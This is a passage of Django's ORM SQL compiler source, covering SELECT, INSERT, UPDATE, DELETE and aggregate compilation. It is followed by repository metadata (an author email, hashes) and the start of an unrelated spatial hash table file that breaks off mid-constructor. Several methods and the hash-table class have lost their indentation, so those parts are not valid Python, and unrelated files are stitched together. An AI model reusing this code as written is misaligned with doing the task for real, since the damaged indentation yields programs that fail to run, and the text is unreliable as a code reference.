if with_limit_offset and not self.connection.features.supports_select_for_update_with_limit:
raise NotSupportedError(
'LIMIT/OFFSET is not supported with '
'select_for_update on this database backend.'
)
nowait = self.query.select_for_update_nowait
skip_locked = self.query.select_for_update_skip_locked
of = self.query.select_for_update_of
# If it's a NOWAIT/SKIP LOCKED/OF query but the backend
# doesn't support it, raise NotSupportedError to prevent a
# possible deadlock.
if nowait and not self.connection.features.has_select_for_update_nowait:
raise NotSupportedError('NOWAIT is not supported on this database backend.')
elif skip_locked and not self.connection.features.has_select_for_update_skip_locked:
raise NotSupportedError('SKIP LOCKED is not supported on this database backend.')
elif of and not self.connection.features.has_select_for_update_of:
raise NotSupportedError('FOR UPDATE OF is not supported on this database backend.')
for_update_part = self.connection.ops.for_update_sql(
nowait=nowait,
skip_locked=skip_locked,
of=self.get_select_for_update_of_arguments(),
)
if for_update_part and self.connection.features.for_update_after_from:
result.append(for_update_part)
if where:
result.append('WHERE %s' % where)
params.extend(w_params)
grouping = []
for g_sql, g_params in group_by:
grouping.append(g_sql)
params.extend(g_params)
if grouping:
if distinct_fields:
raise NotImplementedError('annotate() + distinct(fields) is not implemented.')
order_by = order_by or self.connection.ops.force_no_ordering()
result.append('GROUP BY %s' % ', '.join(grouping))
if having:
result.append('HAVING %s' % having)
params.extend(h_params)
if self.query.explain_query:
result.insert(0, self.connection.ops.explain_query_prefix(
self.query.explain_format,
**self.query.explain_options
))
if order_by:
ordering = []
for _, (o_sql, o_params, _) in order_by:
ordering.append(o_sql)
params.extend(o_params)
result.append('ORDER BY %s' % ', '.join(ordering))
if with_limit_offset:
result.append(self.connection.ops.limit_offset_sql(self.query.low_mark, self.query.high_mark))
if for_update_part and not self.connection.features.for_update_after_from:
result.append(for_update_part)
if self.query.subquery and extra_select:
# If the query is used as a subquery, the extra selects would
# result in more columns than the left-hand side expression is
# expecting. This can happen when a subquery uses a combination
# of order_by() and distinct(), forcing the ordering expressions
# to be selected as well. Wrap the query in another subquery
# to exclude extraneous selects.
sub_selects = []
sub_params = []
for index, (select, _, alias) in enumerate(self.select, start=1):
if not alias and with_col_aliases:
alias = 'col%d' % index
if alias:
sub_selects.append("%s.%s" % (
self.connection.ops.quote_name('subquery'),
self.connection.ops.quote_name(alias),
))
else:
select_clone = select.relabeled_clone({select.alias: 'subquery'})
subselect, subparams = select_clone.as_sql(self, self.connection)
sub_selects.append(subselect)
sub_params.extend(subparams)
return 'SELECT %s FROM (%s) subquery' % (
', '.join(sub_selects),
' '.join(result),
), tuple(sub_params + params)
return ' '.join(result), tuple(params)
finally:
# Finally do cleanup - get rid of the joins we created above.
self.query.reset_refcounts(refcounts_before)
    def get_default_columns(self, start_alias=None, opts=None, from_parent=None):
        """
        Compute the default columns for selecting every field in the base
        model. Will sometimes be called to pull in related models (e.g. via
        select_related), in which case "opts" and "start_alias" will be given
        to provide a starting point for the traversal.
        Return a list of column expressions (the result of field.get_col())
        suitable for inclusion in the SELECT clause.
        """
        result = []
        if opts is None:
            opts = self.query.get_meta()
        # Mapping used to skip deferred fields below.
        only_load = self.deferred_to_columns()
        start_alias = start_alias or self.query.get_initial_alias()
        # The 'seen_models' is used to optimize checking the needed parent
        # alias for a given field. This also includes None -> start_alias to
        # be used by local fields.
        seen_models = {None: start_alias}
        for field in opts.concrete_fields:
            model = field.model._meta.concrete_model
            # A proxy model will have a different model and concrete_model. We
            # will assign None if the field belongs to this model.
            if model == opts.model:
                model = None
            if from_parent and model is not None and issubclass(
                    from_parent._meta.concrete_model, model._meta.concrete_model):
                # Avoid loading data for already loaded parents.
                # We end up here in the case select_related() resolution
                # proceeds from parent model to child model. In that case the
                # parent model data is already present in the SELECT clause,
                # and we want to avoid reloading the same data again.
                continue
            # Skip deferred fields: load only the columns listed for the model.
            if field.model in only_load and field.attname not in only_load[field.model]:
                continue
            alias = self.query.join_parent_model(opts, model, start_alias,
                                                 seen_models)
            column = field.get_col(alias)
            result.append(column)
        return result
    def get_distinct(self):
        """
        Return a quoted list of fields to use in the DISTINCT ON part of the
        query, together with their parameters.
        This method can alter the tables in the query, and thus it must be
        called before get_from_clause().
        """
        result = []
        params = []
        opts = self.query.get_meta()
        for name in self.query.distinct_fields:
            parts = name.split(LOOKUP_SEP)
            _, targets, alias, joins, path, _, transform_function = self._setup_joins(parts, opts, None)
            # Drop joins that aren't needed to reach the target columns.
            targets, alias, _ = self.query.trim_joins(targets, joins, path)
            for target in targets:
                if name in self.query.annotation_select:
                    # Annotations are referenced by alias, not recompiled.
                    result.append(name)
                else:
                    r, p = self.compile(transform_function(target, alias))
                    result.append(r)
                    params.append(p)
        return result, params
    def find_ordering_name(self, name, opts, alias=None, default_order='ASC',
                           already_seen=None):
        """
        Return the table alias (the name might be ambiguous, the alias will
        not be) and column name for ordering by the given 'name' parameter.
        The 'name' is of the form 'field1__field2__...__fieldN'.
        Return a list of (OrderBy expression, is_ref) pairs; is_ref is always
        False here.
        """
        name, order = get_order_dir(name, default_order)
        descending = order == 'DESC'
        pieces = name.split(LOOKUP_SEP)
        field, targets, alias, joins, path, opts, transform_function = self._setup_joins(pieces, opts, alias)
        # If we get to this point and the field is a relation to another model,
        # append the default ordering for that model unless the attribute name
        # of the field is specified.
        if field.is_relation and opts.ordering and getattr(field, 'attname', None) != name:
            # Firstly, avoid infinite loops.
            already_seen = already_seen or set()
            join_tuple = tuple(getattr(self.query.alias_map[j], 'join_cols', None) for j in joins)
            if join_tuple in already_seen:
                raise FieldError('Infinite loop caused by ordering.')
            already_seen.add(join_tuple)
            # Recurse into the related model's Meta.ordering.
            results = []
            for item in opts.ordering:
                results.extend(self.find_ordering_name(item, opts, alias,
                                                       order, already_seen))
            return results
        targets, alias, _ = self.query.trim_joins(targets, joins, path)
        return [(OrderBy(transform_function(t, alias), descending=descending), False) for t in targets]
def _setup_joins(self, pieces, opts, alias):
"""
Helper method for get_order_by() and get_distinct().
get_ordering() and get_distinct() must produce same target columns on
same input, as the prefixes of get_ordering() and get_distinct() must
match. Executing SQL where this is not true is an error.
"""
alias = alias or self.query.get_initial_alias()
field, targets, opts, joins, path, transform_function = self.query.setup_joins(pieces, opts, alias)
alias = joins[-1]
return field, targets, alias, joins, path, opts, transform_function
    def get_from_clause(self):
        """
        Return a list of strings that are joined together to go after the
        "FROM" part of the query, as well as a list of any extra parameters
        that need to be included. Subclasses can override this to create a
        from-clause via a "select".
        This should only be called after any SQL construction methods that
        might change the tables that are needed. This means the select columns,
        ordering, and distinct must be done first.
        """
        result = []
        params = []
        for alias in tuple(self.query.alias_map):
            if not self.query.alias_refcount[alias]:
                # Unreferenced aliases contribute nothing to the FROM clause.
                continue
            try:
                from_clause = self.query.alias_map[alias]
            except KeyError:
                # Extra tables can end up in self.tables, but not in the
                # alias_map if they aren't in a join. That's OK. We skip them.
                continue
            clause_sql, clause_params = self.compile(from_clause)
            result.append(clause_sql)
            params.extend(clause_params)
        for t in self.query.extra_tables:
            alias, _ = self.query.table_alias(t)
            # Only add the alias if it's not already present (the table_alias()
            # call increments the refcount, so an alias refcount of one means
            # this is the only reference).
            if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
                result.append(', %s' % self.quote_name_unless_alias(alias))
        return result, params
    def get_related_selections(self, select, opts=None, root_alias=None, cur_depth=1,
                               requested=None, restricted=None):
        """
        Fill in the information needed for a select_related query. The current
        depth is measured as the number of connections away from the root model
        (for example, cur_depth=1 means we are looking at models with direct
        connections to the root model).
        """
        def _get_field_choices():
            # All names a caller may legally pass to select_related().
            direct_choices = (f.name for f in opts.fields if f.is_relation)
            reverse_choices = (
                f.field.related_query_name()
                for f in opts.related_objects if f.field.unique
            )
            return chain(direct_choices, reverse_choices, self.query._filtered_relations)
        related_klass_infos = []
        if not restricted and cur_depth > self.query.max_depth:
            # We've recursed far enough; bail out.
            return related_klass_infos
        if not opts:
            opts = self.query.get_meta()
            root_alias = self.query.get_initial_alias()
        only_load = self.query.get_loaded_field_names()
        # Setup for the case when only particular related fields should be
        # included in the related selection.
        fields_found = set()
        if requested is None:
            restricted = isinstance(self.query.select_related, dict)
            if restricted:
                requested = self.query.select_related
        def get_related_klass_infos(klass_info, related_klass_infos):
            klass_info['related_klass_infos'] = related_klass_infos
        for f in opts.fields:
            field_model = f.model._meta.concrete_model
            fields_found.add(f.name)
            if restricted:
                next = requested.get(f.name, {})
                if not f.is_relation:
                    # If a non-related field is used like a relation,
                    # or if a single non-relational field is given.
                    if next or f.name in requested:
                        raise FieldError(
                            "Non-relational field given in select_related: '%s'. "
                            "Choices are: %s" % (
                                f.name,
                                ", ".join(_get_field_choices()) or '(none)',
                            )
                        )
            else:
                next = False
            if not select_related_descend(f, restricted, requested,
                                          only_load.get(field_model)):
                continue
            klass_info = {
                'model': f.remote_field.model,
                'field': f,
                'reverse': False,
                'local_setter': f.set_cached_value,
                'remote_setter': f.remote_field.set_cached_value if f.unique else lambda x, y: None,
                'from_parent': False,
            }
            related_klass_infos.append(klass_info)
            select_fields = []
            _, _, _, joins, _, _ = self.query.setup_joins(
                [f.name], opts, root_alias)
            alias = joins[-1]
            columns = self.get_default_columns(start_alias=alias, opts=f.remote_field.model._meta)
            for col in columns:
                select_fields.append(len(select))
                select.append((col, None))
            klass_info['select_fields'] = select_fields
            next_klass_infos = self.get_related_selections(
                select, f.remote_field.model._meta, alias, cur_depth + 1, next, restricted)
            get_related_klass_infos(klass_info, next_klass_infos)
        if restricted:
            # Reverse one-to-one relations (unique, non-m2m related objects).
            related_fields = [
                (o.field, o.related_model)
                for o in opts.related_objects
                if o.field.unique and not o.many_to_many
            ]
            for f, model in related_fields:
                if not select_related_descend(f, restricted, requested,
                                              only_load.get(model), reverse=True):
                    continue
                related_field_name = f.related_query_name()
                fields_found.add(related_field_name)
                join_info = self.query.setup_joins([related_field_name], opts, root_alias)
                alias = join_info.joins[-1]
                from_parent = issubclass(model, opts.model) and model is not opts.model
                klass_info = {
                    'model': model,
                    'field': f,
                    'reverse': True,
                    'local_setter': f.remote_field.set_cached_value,
                    'remote_setter': f.set_cached_value,
                    'from_parent': from_parent,
                }
                related_klass_infos.append(klass_info)
                select_fields = []
                columns = self.get_default_columns(
                    start_alias=alias, opts=model._meta, from_parent=opts.model)
                for col in columns:
                    select_fields.append(len(select))
                    select.append((col, None))
                klass_info['select_fields'] = select_fields
                next = requested.get(f.related_query_name(), {})
                next_klass_infos = self.get_related_selections(
                    select, model._meta, alias, cur_depth + 1,
                    next, restricted)
                get_related_klass_infos(klass_info, next_klass_infos)
            # NOTE(review): this assignment appears to be dead -- the value is
            # recomputed below (after fields_found may have grown) before its
            # only use; confirm before removing.
            fields_not_found = set(requested).difference(fields_found)
            for name in list(requested):
                # Filtered relations work only on the topmost level.
                if cur_depth > 1:
                    break
                if name in self.query._filtered_relations:
                    fields_found.add(name)
                    f, _, join_opts, joins, _, _ = self.query.setup_joins([name], opts, root_alias)
                    model = join_opts.model
                    alias = joins[-1]
                    from_parent = issubclass(model, opts.model) and model is not opts.model
                    def local_setter(obj, from_obj):
                        f.remote_field.set_cached_value(from_obj, obj)
                    def remote_setter(obj, from_obj):
                        setattr(from_obj, name, obj)
                    klass_info = {
                        'model': model,
                        'field': f,
                        'reverse': True,
                        'local_setter': local_setter,
                        'remote_setter': remote_setter,
                        'from_parent': from_parent,
                    }
                    related_klass_infos.append(klass_info)
                    select_fields = []
                    columns = self.get_default_columns(
                        start_alias=alias, opts=model._meta,
                        from_parent=opts.model,
                    )
                    for col in columns:
                        select_fields.append(len(select))
                        select.append((col, None))
                    klass_info['select_fields'] = select_fields
                    next_requested = requested.get(name, {})
                    next_klass_infos = self.get_related_selections(
                        select, opts=model._meta, root_alias=alias,
                        cur_depth=cur_depth + 1, requested=next_requested,
                        restricted=restricted,
                    )
                    get_related_klass_infos(klass_info, next_klass_infos)
            fields_not_found = set(requested).difference(fields_found)
            if fields_not_found:
                invalid_fields = ("'%s'" % s for s in fields_not_found)
                raise FieldError(
                    'Invalid field name(s) given in select_related: %s. '
                    'Choices are: %s' % (
                        ', '.join(invalid_fields),
                        ', '.join(_get_field_choices()) or '(none)',
                    )
                )
        return related_klass_infos
    def get_select_for_update_of_arguments(self):
        """
        Return a quoted list of arguments for the SELECT FOR UPDATE OF part of
        the query.
        """
        def _get_field_choices():
            """Yield all allowed field paths in breadth-first search order."""
            queue = collections.deque([(None, self.klass_info)])
            while queue:
                parent_path, klass_info = queue.popleft()
                if parent_path is None:
                    path = []
                    yield 'self'
                else:
                    field = klass_info['field']
                    if klass_info['reverse']:
                        field = field.remote_field
                    path = parent_path + [field.name]
                    yield LOOKUP_SEP.join(path)
                queue.extend(
                    (path, klass_info)
                    for klass_info in klass_info.get('related_klass_infos', [])
                )
        result = []
        invalid_names = []
        for name in self.query.select_for_update_of:
            parts = [] if name == 'self' else name.split(LOOKUP_SEP)
            klass_info = self.klass_info
            # Walk the klass_info tree following each path component.
            for part in parts:
                for related_klass_info in klass_info.get('related_klass_infos', []):
                    field = related_klass_info['field']
                    if related_klass_info['reverse']:
                        field = field.remote_field
                    if field.name == part:
                        klass_info = related_klass_info
                        break
                else:
                    # No relation at this level matched the path component.
                    klass_info = None
                    break
            if klass_info is None:
                invalid_names.append(name)
                continue
            select_index = klass_info['select_fields'][0]
            col = self.select[select_index][0]
            if self.connection.features.select_for_update_of_column:
                result.append(self.compile(col)[0])
            else:
                result.append(self.quote_name_unless_alias(col.alias))
        if invalid_names:
            raise FieldError(
                'Invalid field name(s) given in select_for_update(of=(...)): %s. '
                'Only relational fields followed in the query are allowed. '
                'Choices are: %s.' % (
                    ', '.join(invalid_names),
                    ', '.join(_get_field_choices()),
                )
            )
        return result
def deferred_to_columns(self):
"""
Convert the self.deferred_loading data structure to mapping of table
names to sets of column names which are to be loaded. Return the
dictionary.
"""
columns = {}
self.query.deferred_to_data(columns, self.query.get_loaded_field_names_cb)
return columns
    def get_converters(self, expressions):
        """
        Map each select-list position to the database converters that must be
        applied to its value: {index: ([converter, ...], expression)}.
        """
        converters = {}
        for i, expression in enumerate(expressions):
            if expression:
                backend_converters = self.connection.ops.get_db_converters(expression)
                field_converters = expression.get_db_converters(self.connection)
                if backend_converters or field_converters:
                    convs = []
                    for conv in (backend_converters + field_converters):
                        # Legacy converters took a 'context' argument; shim
                        # them with an empty context and warn about removal.
                        if func_supports_parameter(conv, 'context'):
                            warnings.warn(
                                'Remove the context parameter from %s.%s(). Support for it '
                                'will be removed in Django 3.0.' % (
                                    conv.__self__.__class__.__name__,
                                    conv.__name__,
                                ),
                                RemovedInDjango30Warning,
                            )
                            conv = functools.partial(conv, context={})
                        convs.append(conv)
                    converters[i] = (convs, expression)
        return converters
def apply_converters(self, rows, converters):
connection = self.connection
converters = list(converters.items())
for row in map(list, rows):
for pos, (convs, expression) in converters:
value = row[pos]
for converter in convs:
value = converter(value, expression, connection)
row[pos] = value
yield row
    def results_iter(self, results=None, tuple_expected=False, chunked_fetch=False,
                     chunk_size=GET_ITERATOR_CHUNK_SIZE):
        """Return an iterator over the results from executing this query."""
        if results is None:
            results = self.execute_sql(MULTI, chunked_fetch=chunked_fetch, chunk_size=chunk_size)
        fields = [s[0] for s in self.select[0:self.col_count]]
        converters = self.get_converters(fields)
        rows = chain.from_iterable(results)
        if converters:
            rows = self.apply_converters(rows, converters)
            if tuple_expected:
                # apply_converters() yields lists; restore tuples on request.
                rows = map(tuple, rows)
        return rows
    def has_results(self):
        """
        Backends (e.g. NoSQL) can override this in order to use optimized
        versions of "query has any results."
        """
        # This is always executed on a query clone, so we can modify self.query
        # Restrict the select list to the constant 1 (via extra + extra mask)
        # to keep the existence probe as cheap as possible.
        self.query.add_extra({'a': 1}, None, None, None, None, None)
        self.query.set_extra_mask(['a'])
        return bool(self.execute_sql(SINGLE))
    def execute_sql(self, result_type=MULTI, chunked_fetch=False, chunk_size=GET_ITERATOR_CHUNK_SIZE):
        """
        Run the query against the database and return the result(s). The
        return value is a single data item if result_type is SINGLE, or an
        iterator over the results if the result_type is MULTI.
        result_type is either MULTI (use fetchmany() to retrieve all rows),
        SINGLE (only retrieve a single row), or None. In this last case, the
        cursor is returned if any query is executed, since it's used by
        subclasses such as InsertQuery. It's possible, however, that no query
        is needed, as the filters describe an empty set. In that case, None is
        returned, to avoid any unnecessary database interaction.
        """
        result_type = result_type or NO_RESULTS
        try:
            sql, params = self.as_sql()
            if not sql:
                raise EmptyResultSet
        except EmptyResultSet:
            if result_type == MULTI:
                return iter([])
            else:
                return
        if chunked_fetch:
            cursor = self.connection.chunked_cursor()
        else:
            cursor = self.connection.cursor()
        try:
            cursor.execute(sql, params)
        except Exception:
            # Might fail for server-side cursors (e.g. connection closed)
            cursor.close()
            raise
        if result_type == CURSOR:
            # Give the caller the cursor to process and close.
            return cursor
        if result_type == SINGLE:
            try:
                val = cursor.fetchone()
                if val:
                    # Trim any extra selects (e.g. ordering expressions).
                    return val[0:self.col_count]
                return val
            finally:
                # done with the cursor
                cursor.close()
        if result_type == NO_RESULTS:
            cursor.close()
            return
        result = cursor_iter(
            cursor, self.connection.features.empty_fetchmany_value,
            self.col_count if self.has_extra_select else None,
            chunk_size,
        )
        if not chunked_fetch and not self.connection.features.can_use_chunked_reads:
            try:
                # If we are using non-chunked reads, we return the same data
                # structure as normally, but ensure it is all read into memory
                # before going any further. Use chunked_fetch if requested.
                return list(result)
            finally:
                # done with the cursor
                cursor.close()
        return result
def as_subquery_condition(self, alias, columns, compiler):
qn = compiler.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
for index, select_col in enumerate(self.query.select):
lhs_sql, lhs_params = self.compile(select_col)
rhs = '%s.%s' % (qn(alias), qn2(columns[index]))
self.query.where.add(
QueryWrapper('%s = %s' % (lhs_sql, rhs), lhs_params), 'AND')
sql, params = self.as_sql()
return 'EXISTS (%s)' % sql, params
def explain_query(self):
result = list(self.execute_sql())
# Some backends return 1 item tuples with strings, and others return
# tuples with integers and strings. Flatten them out into strings.
for row in result[0]:
if not isinstance(row, str):
yield ' '.join(str(c) for c in row)
else:
yield row
class SQLInsertCompiler(SQLCompiler):
    # Whether execute_sql() should ask the backend for the inserted row's id.
    return_id = False
    def field_as_sql(self, field, val):
        """
        Take a field and a value intended to be saved on that field, and
        return placeholder SQL and accompanying params. Check for raw values,
        expressions, and fields with get_placeholder() defined in that order.
        When field is None, consider the value raw and use it as the
        placeholder, with no corresponding parameters returned.
        """
        if field is None:
            # A field value of None means the value is raw.
            sql, params = val, []
        elif hasattr(val, 'as_sql'):
            # This is an expression, let's compile it.
            sql, params = self.compile(val)
        elif hasattr(field, 'get_placeholder'):
            # Some fields (e.g. geo fields) need special munging before
            # they can be inserted.
            sql, params = field.get_placeholder(val, self, self.connection), [val]
        else:
            # Return the common case for the placeholder
            sql, params = '%s', [val]
        # The following hook is only used by Oracle Spatial, which sometimes
        # needs to yield 'NULL' and [] as its placeholder and params instead
        # of '%s' and [None]. The 'NULL' placeholder is produced earlier by
        # OracleOperations.get_geom_placeholder(). The following line removes
        # the corresponding None parameter. See ticket #10888.
        params = self.connection.ops.modify_insert_params(sql, params)
        return sql, params
    def prepare_value(self, field, value):
        """
        Prepare a value to be used in a query by resolving it if it is an
        expression and otherwise calling the field's get_db_prep_save().
        """
        if hasattr(value, 'resolve_expression'):
            value = value.resolve_expression(self.query, allow_joins=False, for_save=True)
            # Don't allow values containing Col expressions. They refer to
            # existing columns on a row, but in the case of insert the row
            # doesn't exist yet.
            if value.contains_column_references:
                raise ValueError(
                    'Failed to insert expression "%s" on %s. F() expressions '
                    'can only be used to update, not to insert.' % (value, field)
                )
            if value.contains_aggregate:
                raise FieldError("Aggregate functions are not allowed in this query")
            if value.contains_over_clause:
                raise FieldError('Window expressions are not allowed in this query.')
        else:
            value = field.get_db_prep_save(value, connection=self.connection)
        return value
    def pre_save_val(self, field, obj):
        """
        Get the given field's value off the given obj. pre_save() is used for
        things like auto_now on DateTimeField. Skip it if this is a raw query.
        """
        if self.query.raw:
            return getattr(obj, field.attname)
        return field.pre_save(obj, add=True)
    def assemble_as_sql(self, fields, value_rows):
        """
        Take a sequence of N fields and a sequence of M rows of values, and
        generate placeholder SQL and parameters for each field and value.
        Return a pair containing:
         * a sequence of M rows of N SQL placeholder strings, and
         * a sequence of M rows of corresponding parameter values.
        Each placeholder string may contain any number of '%s' interpolation
        strings, and each parameter row will contain exactly as many params
        as the total number of '%s's in the corresponding placeholder row.
        """
        if not value_rows:
            return [], []
        # list of (sql, [params]) tuples for each object to be saved
        # Shape: [n_objs][n_fields][2]
        rows_of_fields_as_sql = (
            (self.field_as_sql(field, v) for field, v in zip(fields, row))
            for row in value_rows
        )
        # tuple like ([sqls], [[params]s]) for each object to be saved
        # Shape: [n_objs][2][n_fields]
        sql_and_param_pair_rows = (zip(*row) for row in rows_of_fields_as_sql)
        # Extract separate lists for placeholders and params.
        # Each of these has shape [n_objs][n_fields]
        placeholder_rows, param_rows = zip(*sql_and_param_pair_rows)
        # Params for each field are still lists, and need to be flattened.
        param_rows = [[p for ps in row for p in ps] for row in param_rows]
        return placeholder_rows, param_rows
    def as_sql(self):
        """
        Build the INSERT statement(s). Return a list of (sql, params) pairs:
        a single pair when the backend can bulk-insert or when an id must be
        returned, otherwise one pair per object.
        """
        # We don't need quote_name_unless_alias() here, since these are all
        # going to be column names (so we can avoid the extra overhead).
        qn = self.connection.ops.quote_name
        opts = self.query.get_meta()
        result = ['INSERT INTO %s' % qn(opts.db_table)]
        fields = self.query.fields or [opts.pk]
        result.append('(%s)' % ', '.join(qn(f.column) for f in fields))
        if self.query.fields:
            value_rows = [
                [self.prepare_value(field, self.pre_save_val(field, obj)) for field in fields]
                for obj in self.query.objs
            ]
        else:
            # An empty object.
            value_rows = [[self.connection.ops.pk_default_value()] for _ in self.query.objs]
            fields = [None]
        # Currently the backends just accept values when generating bulk
        # queries and generate their own placeholders. Doing that isn't
        # necessary and it should be possible to use placeholders and
        # expressions in bulk inserts too.
        can_bulk = (not self.return_id and self.connection.features.has_bulk_insert)
        placeholder_rows, param_rows = self.assemble_as_sql(fields, value_rows)
        if self.return_id and self.connection.features.can_return_id_from_insert:
            if self.connection.features.can_return_ids_from_bulk_insert:
                result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
                params = param_rows
            else:
                result.append("VALUES (%s)" % ", ".join(placeholder_rows[0]))
                params = [param_rows[0]]
            col = "%s.%s" % (qn(opts.db_table), qn(opts.pk.column))
            r_fmt, r_params = self.connection.ops.return_insert_id()
            # Skip empty r_fmt to allow subclasses to customize behavior for
            # 3rd party backends. Refs #19096.
            if r_fmt:
                result.append(r_fmt % col)
                params += [r_params]
            return [(" ".join(result), tuple(chain.from_iterable(params)))]
        if can_bulk:
            result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
            return [(" ".join(result), tuple(p for ps in param_rows for p in ps))]
        else:
            return [
                (" ".join(result + ["VALUES (%s)" % ", ".join(p)]), vals)
                for p, vals in zip(placeholder_rows, param_rows)
            ]
    def execute_sql(self, return_id=False):
        """
        Run the INSERT statement(s); optionally return the inserted id(s).
        """
        assert not (
            return_id and len(self.query.objs) != 1 and
            not self.connection.features.can_return_ids_from_bulk_insert
        )
        self.return_id = return_id
        with self.connection.cursor() as cursor:
            for sql, params in self.as_sql():
                cursor.execute(sql, params)
            if not return_id:
                return
            if self.connection.features.can_return_ids_from_bulk_insert and len(self.query.objs) > 1:
                return self.connection.ops.fetch_returned_insert_ids(cursor)
            if self.connection.features.can_return_id_from_insert:
                assert len(self.query.objs) == 1
                return self.connection.ops.fetch_returned_insert_id(cursor)
            # Fall back to asking the backend for the last autoincrement id.
            return self.connection.ops.last_insert_id(
                cursor, self.query.get_meta().db_table, self.query.get_meta().pk.column
            )
class SQLDeleteCompiler(SQLCompiler):
    def as_sql(self):
        """
        Build the DELETE statement. Return the SQL string and a tuple of
        parameters.
        """
        active_tables = [t for t in self.query.alias_map if self.query.alias_refcount[t] > 0]
        assert len(active_tables) == 1, \
            "Can only delete from one table at a time."
        qn = self.quote_name_unless_alias
        sql_parts = ['DELETE FROM %s' % qn(self.query.base_table)]
        where_sql, where_params = self.compile(self.query.where)
        if where_sql:
            sql_parts.append('WHERE %s' % where_sql)
        return ' '.join(sql_parts), tuple(where_params)
class SQLUpdateCompiler(SQLCompiler):
    def as_sql(self):
        """
        Create the SQL for this query. Return the SQL string and list of
        parameters.
        """
        self.pre_sql_setup()
        if not self.query.values:
            return '', ()
        qn = self.quote_name_unless_alias
        values, update_params = [], []
        for field, model, val in self.query.values:
            if hasattr(val, 'resolve_expression'):
                val = val.resolve_expression(self.query, allow_joins=False, for_save=True)
                if val.contains_aggregate:
                    raise FieldError("Aggregate functions are not allowed in this query")
                if val.contains_over_clause:
                    raise FieldError('Window expressions are not allowed in this query.')
            elif hasattr(val, 'prepare_database_save'):
                # Model instance: only valid when assigned to a relation.
                if field.remote_field:
                    val = field.get_db_prep_save(
                        val.prepare_database_save(field),
                        connection=self.connection,
                    )
                else:
                    raise TypeError(
                        "Tried to update field %s with a model instance, %r. "
                        "Use a value compatible with %s."
                        % (field, val, field.__class__.__name__)
                    )
            else:
                val = field.get_db_prep_save(val, connection=self.connection)
            # Getting the placeholder for the field.
            if hasattr(field, 'get_placeholder'):
                placeholder = field.get_placeholder(val, self, self.connection)
            else:
                placeholder = '%s'
            name = field.column
            if hasattr(val, 'as_sql'):
                # Compiled expressions embed their SQL into the placeholder.
                sql, params = self.compile(val)
                values.append('%s = %s' % (qn(name), placeholder % sql))
                update_params.extend(params)
            elif val is not None:
                values.append('%s = %s' % (qn(name), placeholder))
                update_params.append(val)
            else:
                values.append('%s = NULL' % qn(name))
        table = self.query.base_table
        result = [
            'UPDATE %s SET' % qn(table),
            ', '.join(values),
        ]
        where, params = self.compile(self.query.where)
        if where:
            result.append('WHERE %s' % where)
        return ' '.join(result), tuple(update_params + params)
    def execute_sql(self, result_type):
        """
        Execute the specified update. Return the number of rows affected by
        the primary update query. The "primary update query" is the first
        non-empty query that is executed. Row counts for any subsequent,
        related queries are not available.
        """
        cursor = super().execute_sql(result_type)
        try:
            rows = cursor.rowcount if cursor else 0
            is_empty = cursor is None
        finally:
            if cursor:
                cursor.close()
        for query in self.query.get_related_updates():
            aux_rows = query.get_compiler(self.using).execute_sql(result_type)
            if is_empty and aux_rows:
                # Report the row count of the first non-empty query executed.
                rows = aux_rows
                is_empty = False
        return rows
    def pre_sql_setup(self):
        """
        If the update depends on results from other tables, munge the "where"
        conditions to match the format required for (portable) SQL updates.
        If multiple updates are required, pull out the id values to update at
        this point so that they don't change as a result of the progressive
        updates.
        """
        refcounts_before = self.query.alias_refcount.copy()
        # Ensure base table is in the query
        self.query.get_initial_alias()
        count = self.query.count_active_tables()
        if not self.query.related_updates and count == 1:
            return
        # Build a pk-only SELECT clone used to pre-select the rows to update.
        query = self.query.chain(klass=Query)
        query.select_related = False
        query.clear_ordering(True)
        query._extra = {}
        query.select = []
        query.add_fields([query.get_meta().pk.name])
        super().pre_sql_setup()
        must_pre_select = count > 1 and not self.connection.features.update_can_self_select
        # Now we adjust the current query: reset the where clause and get rid
        # of all the tables we don't need (since they're in the sub-select).
        self.query.where = self.query.where_class()
        if self.query.related_updates or must_pre_select:
            # Either we're using the idents in multiple update queries (so
            # don't want them to change), or the db backend doesn't support
            # selecting from the updating table (e.g. MySQL).
            idents = []
            for rows in query.get_compiler(self.using).execute_sql(MULTI):
                idents.extend(r[0] for r in rows)
            self.query.add_filter(('pk__in', idents))
            self.query.related_ids = idents
        else:
            # The fast path. Filters and updates in one query.
            self.query.add_filter(('pk__in', query))
        self.query.reset_refcounts(refcounts_before)
class SQLAggregateCompiler(SQLCompiler):
    def as_sql(self):
        """
        Build the aggregate SELECT wrapped around the inner subquery. Return
        the SQL string and a tuple of parameters.
        """
        sql_parts = []
        params = []
        for annotation in self.query.annotation_select.values():
            ann_sql, ann_params = self.compile(annotation, select_format=FORCE)
            sql_parts.append(ann_sql)
            params.extend(ann_params)
        self.col_count = len(self.query.annotation_select)
        select_sql = ', '.join(sql_parts)
        full_sql = 'SELECT %s FROM (%s) subquery' % (select_sql, self.query.subquery)
        return full_sql, tuple(params) + self.query.sub_params
def cursor_iter(cursor, sentinel, col_count, itersize):
    """
    Yield blocks of rows from a cursor, optionally truncating each row to
    col_count columns, and ensure the cursor is closed when done.
    """
    try:
        while True:
            rows = cursor.fetchmany(itersize)
            if rows == sentinel:
                break
            if col_count is None:
                yield rows
            else:
                yield [row[:col_count] for row in rows]
    finally:
        cursor.close()
|
[
"rizwansoaib@gmail.com"
] |
rizwansoaib@gmail.com
|
00fe1a578edc91b4d4734fcc27e0575cc817ea1f
|
eef7c5e1ece154796b8c0b8a772cc172de1cba50
|
/hashTable.py
|
546a9c50e5c09441eff558180435dd68053d849b
|
[] |
no_license
|
NILOIDE/Coordinate_HashTable
|
957fdc2091daad47b39e591910ce880b7bd7f16c
|
5e761eefac10cec875b167df1903cd07129899d3
|
refs/heads/master
| 2020-06-15T23:28:31.299003
| 2019-07-05T14:37:58
| 2019-07-05T14:37:58
| 195,420,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,801
|
py
|
import numpy as np
class SpatialHashTable(object):
"""
Hash table used to split coordinate system into buckets. Objects can be assigned to all buckets
that overlap with the provided volume. A hash table is useful in cases where it becomes
inefficient to search through all items in the coordinate system. Assigning objects to buckets
allows for a selected retrieval of neighboring objects.
Written by: Nil Stolt Ansó, 05/07/2019
"""
    def __init__(self, dims, bucket_size):
        """
        Build the table and allocate one empty bucket per grid cell.
        :param dims: np.ndarray giving the coordinate-space extent per axis.
        :param bucket_size: Side length shared by all (cubic) buckets.
        """
        self.dims = dims
